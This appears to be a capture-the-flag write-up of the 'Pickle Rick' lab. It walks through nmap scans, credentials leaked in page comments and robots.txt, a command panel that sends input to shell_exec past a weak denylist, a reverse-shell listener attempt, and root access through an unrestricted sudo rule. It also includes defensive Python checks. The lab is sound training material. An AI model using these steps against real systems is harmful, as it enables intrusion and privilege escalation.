Try Hack Me - Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

View the page

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Scan with Nmap

kali@kali:~/ctf/thm/pickle_rick$ nmap -sV 10.10.198.132 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 22:14 PDT
Nmap scan report for 10.10.198.132
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.81 seconds

Try SSH

kali@kali:~/ctf/thm/pickle_rick$ ssh R1ckRul3s@10.10.198.132
R1ckRul3s@10.10.198.132: Permission denied (publickey).

Hmm.. ok, so we're going to need the keys; no brute forcing with Hydra or the usual. What else can we find via the web server?

Scan Harder

kali@kali:~/ctf/thm/pickle_rick$ nmap --script=vuln 10.10.52.189
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-06 00:32 PDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.52.189
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|_  /robots.txt: Robots file
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-sql-injection: 
|   Possible sqli for queries:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 370.62 seconds

Ah yes, login.php and robots.txt! We get a login form, and the contents of robots.txt turn out to be a password.

If we use that as the password on the login page we get a "command panel" page in which we can enter a command like ls or cat Sup3rS3cretPickl3Ingred.txt. Ok, cat doesn't work, but we can just read that file directly and get the first of three ingredients! Poking around the filesystem some more we see a home directory for rick. We can read the file there, /home/rick/second ingredients, using less, which apparently is not restricted the way cat is, and get the second ingredient!

Hmm, there is a cookie, PHPSESSID=cjsnqqo3lqlg7m361ophebd1l3, but that doesn't seem to be related to anything.

Ok, what about looking at the source of this portal page? Now that we know we can dump the contents of a file with less, we can less portal.php to see what we may see. Oh boy!

<?php
session_start();

if($_SESSION["login"] == false) {
   header("Location: /login.php"); die();
}

?>

<?php
  // Case-insensitive substring search: true if any word in $arr appears anywhere in $str
  function contains($str, array $arr)
  {
      foreach($arr as $a) {
          if (stripos($str,$a) !== false) return true;
      }
      return false;
  }
  // Cant use cat
  $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
  if(isset($_POST["command"])) {
    if(contains($_POST["command"], $cmds)) {
      echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
    } else {
      // Anything that survives the denylist goes straight to the shell
      $output = shell_exec($_POST["command"]);
      echo "</br><pre>$output</pre>";
    }
  }
?>
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->

Well, two things. Now we see the commands we "can't" run, and what looks like a Base64 encoded string in a comment. Might as well take a quick look at login.php as well.

<?php
session_start();
$errorMsg = "";
$validUser = $_SESSION["login"] === true;
if(isset($_POST["sub"])) {
  $validUser = $_POST["username"] == "R1ckRul3s" && $_POST["password"] == "Wubbalubbadubdub";
  if(!$validUser) $errorMsg = "Invalid username or password.";
  else $_SESSION["login"] = true;
}
if($validUser) {
   header("Location: /portal.php"); die();
}
?>

Mmmhmmm. Nothing revelatory. And it points out that the Base64-looking string was just a comment in the output HTML to begin with. Except it doesn't decode.... or does it? Base64-decode it 4 times and you finally end up with "rabbit hole". Indeed.
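The portal.php check above is a case-insensitive substring denylist: any command that does not contain one of seven words goes straight to shell_exec(), which is exactly why less sails through while cat is refused. The Python below is an added example, not code from the room or this writeup: it models that denylist next to an allowlist check of the kind the panel would need, parsing the command with shlex, refusing shell metacharacters and accepting only a program name from a fixed set (the allowlisted set and the metacharacter list are assumptions).

```python
# Added example: the substring denylist used by portal.php, modelled in
# Python, beside an allowlist check. Neither function is from the room.
import shlex
from typing import Tuple

# The seven words portal.php refuses (from the page's $cmds array).
DENYLIST = ("cat", "head", "more", "tail", "nano", "vim", "vi")
# Assumed set of programs a command panel might legitimately expose.
ALLOWLIST = frozenset({"ls", "id", "whoami", "pwd", "uname", "date"})
# Characters that turn one command into a pipeline, chain or substitution.
SHELL_META = set(";|&$`<>(){}\n\\*?~")


def denylist_check(command: str) -> bool:
    """True if portal.php would refuse `command`.

    Mirrors contains(): stripos() is a case-insensitive substring search,
    so only the seven literal words are caught; any other program runs."""
    lowered = command.lower()
    return any(word in lowered for word in DENYLIST)


def allowlist_check(command: str) -> Tuple[bool, str]:
    """(allowed, reason): accept only a bare allowlisted program with
    plain arguments, parsed like a shell would but never handed to one."""
    if any(ch in SHELL_META for ch in command):
        return False, "shell metacharacter present"
    try:
        argv = shlex.split(command)
    except ValueError as exc:          # e.g. an unbalanced quote
        return False, f"unparseable command: {exc}"
    if not argv:
        return False, "empty command"
    if argv[0] not in ALLOWLIST:
        return False, f"program not allowlisted: {argv[0]}"
    return True, "ok"


if __name__ == "__main__":
    for cmd in ("ls", "cat Sup3rS3cretPickl3Ingred.txt", "less portal.php",
                "sudo ls -la /root", "ls; id"):
        print(f"{cmd!r:40} denylist blocks: {denylist_check(cmd)!s:5} "
              f"allowlist: {allowlist_check(cmd)}")
```

An accepted argv should then be executed as a list via subprocess.run(argv) with no shell, never re-joined into a string for shell_exec-style execution.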

What about starting a reverse shell? I've confirmed we can ping my attacker machine, but alas:

kali@kali:~/ctf/thm/pickle_rick$ nc -vv -l -p 4444
listening on [any] 4444 ...
10.10.187.81: inverse host lookup failed: Unknown host
connect to [10.2.41.105] from (UNKNOWN) [10.10.187.81] 44530
 sent 0, rcvd 0

Ok. Keep it simple and do it all through the web page itself. No reverse shell, no CVE, no SSH. How about sudo -l?

Matching Defaults entries for www-data on ip-10-10-187-81.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-187-81.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
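That sudo -l output is the whole game: the web server's account can run anything as root with no password. As an added example (not from the room or this writeup), the Python below parses sudo -l output of the shape shown above and flags rules that grant ALL commands as root; the sample text is a constructed copy of that output, and the list of service-account names is an assumption.

```python
# Added example: flag sudo rules that let a service account run anything
# as root. Not from the room; the sample text is a constructed copy of
# the `sudo -l` output shown above.
import re
from typing import List

SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on ip-10-10-187-81.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-187-81.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
"""

# Assumed names of accounts that should never hold blanket sudo rights.
SERVICE_ACCOUNTS = frozenset({"www-data", "apache", "nginx", "nobody"})

USER_RE = re.compile(r"^User (\S+) may run the following commands")
# "(runas) [TAG: ...] command", e.g. "(ALL) NOPASSWD: ALL" or "(root) /usr/bin/apt"
RULE_RE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s+(?:(?P<tags>[A-Z:\s]+?):\s+)?(?P<cmd>.+)$")


def audit_sudo_l(text: str) -> List[str]:
    """Return one finding per rule that grants ALL commands as root (or ALL)."""
    findings: List[str] = []
    user = None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        if user is None:
            continue                      # still in the Defaults section
        rule = RULE_RE.match(line)
        if not rule:
            continue
        runas_user = rule.group("runas").split(":")[0].strip()
        tags = rule.group("tags") or ""
        cmd = rule.group("cmd").strip()
        if runas_user in ("ALL", "root") and cmd == "ALL":
            severity = "CRITICAL" if user in SERVICE_ACCOUNTS else "HIGH"
            nopasswd = " without a password" if "NOPASSWD" in tags else ""
            findings.append(f"{severity}: {user} may run ALL as {runas_user}{nopasswd}")
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print(finding)
```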

sudo ls -la /root

total 28
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 Oct  7 02:59 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap

sudo less /root/3rd.txt

3rd ingredients: ***** *****